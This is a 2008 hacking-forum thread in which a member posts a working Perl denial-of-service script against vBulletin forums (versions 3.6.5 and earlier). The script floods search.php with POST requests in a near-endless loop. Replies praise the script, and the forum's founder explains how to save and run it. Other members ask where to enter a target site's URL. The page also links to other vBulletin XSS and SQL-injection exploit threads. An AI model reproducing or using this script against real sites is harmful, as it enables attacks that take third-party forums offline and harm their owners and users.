|
|
|
|||||||
| Notices |
Register Now for FREE!
|
 |
|
|
LinkBack (2) | Thread Tools | Display Modes |
06-16-2008
|
 #1 (permalink)
|
|
Hackerz Guru
  Join Date: Feb 2008
Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 147 Times in 92 Posts
Rep Power: 0
     |
New !! Vbulletin Exploit [All Versions]
Code:
# VBulletin DoS Exploit
#
# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works;)
#
# important => Make sure that Image Verification in (search.php) is NOT Enabled.
# It works on 3.6.5 and prior [all] !
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
exit();
};
Code:
http://www.activestate.com/ActivePerl/ |
|
    
|
|
06-17-2008
|
#2 (permalink) |
|
Respected Member
 
Join Date: Jun 2008
Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34
|
wahhhhhhhhh digi u r a superstar
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high. |
|
|
|
|
06-17-2008
|
#4 (permalink) |
|
Badhackerz
Join Date: Apr 2008
Location: Detention cell
Posts: 619
Thanks: 90
Thanked 53 Times in 21 Posts
Rep Power: 54
|
how to use it digi post some screen shots
__________________
selling To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
06-17-2008
|
#5 (permalink) | |
|
Founder
 
Join Date: Mar 2006
Posts: 7,384
Thanks: 130
Thanked 205 Times in 130 Posts
Rep Power: 276
 |
Quote:
copy the above coded exploit in a notepad file and save it as anyname.pl in your perl/bin folder now open command prompt and run the explot fine via giving correct path i.e c:/perl/bin/anyname.pl i hope it helps  Thanks |
|
|
|
|
|
06-17-2008
|
#6 (permalink) |
|
Badhackerz
Join Date: Apr 2008
Location: Detention cell
Posts: 619
Thanks: 90
Thanked 53 Times in 21 Posts
Rep Power: 54
|
but where to enter site forum url
__________________
selling To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
|
06-19-2008
|
#7 (permalink) |
|
Senior Member
  
Join Date: Mar 2008
Posts: 163
Thanks: 2
Thanked 5 Times in 3 Posts
Rep Power: 34
|
the exploit crashes the whole board ??????????
or u kidding 
__________________
THE WORLD IS NOT ENOUGH i m the_bond To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
|
06-19-2008
|
#8 (permalink) | |
|
Hackerz Guru
Join Date: Feb 2008
Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 147 Times in 92 Posts
Rep Power: 0
|
Quote:
|
|
|
|
|
|
06-19-2008
|
#9 (permalink) |
|
Respected Member
Join Date: Jun 2008
Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34
|
im haveing problems useing this?
need some help
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high. |
|
|
|
|
06-20-2008
|
#10 (permalink) |
|
Respected Member
Join Date: Jun 2008
Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34
|
how long should it take?
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high. |
|
|
|
|
| Bookmarks |
|
LinkBacks (?)
LinkBack to this Thread: http://www.badhackerz.com/exploit-codes/10597-new-vbulletin-exploit-all-versions.html
|
||||
| Posted By | For | Type | Date | |
| Digg - New !! Vbulletin Exploit [All Versions] | This thread | Refback | 06-20-2008 08:03 AM | |
| Badhackerz... Ethical hackers - Powered by vBulletin | This thread | Refback | 06-17-2008 02:43 AM | |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod) | Armageddon | Exploit Codes | 2 | 2 Days Ago 07:23 AM |
| Vbulletin Latest exploit not mine | RampageX11 | Exploit Codes | 8 | 1 Week Ago 02:23 PM |
| The Egyptians {ALL VERSIONS} | Insurrection | Sony Ericsson File Downloads | 0 | 08-04-2008 02:09 PM |
| ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit | Chota_boss | Exploit Codes | 0 | 08-02-2008 03:16 PM |
Linear Mode
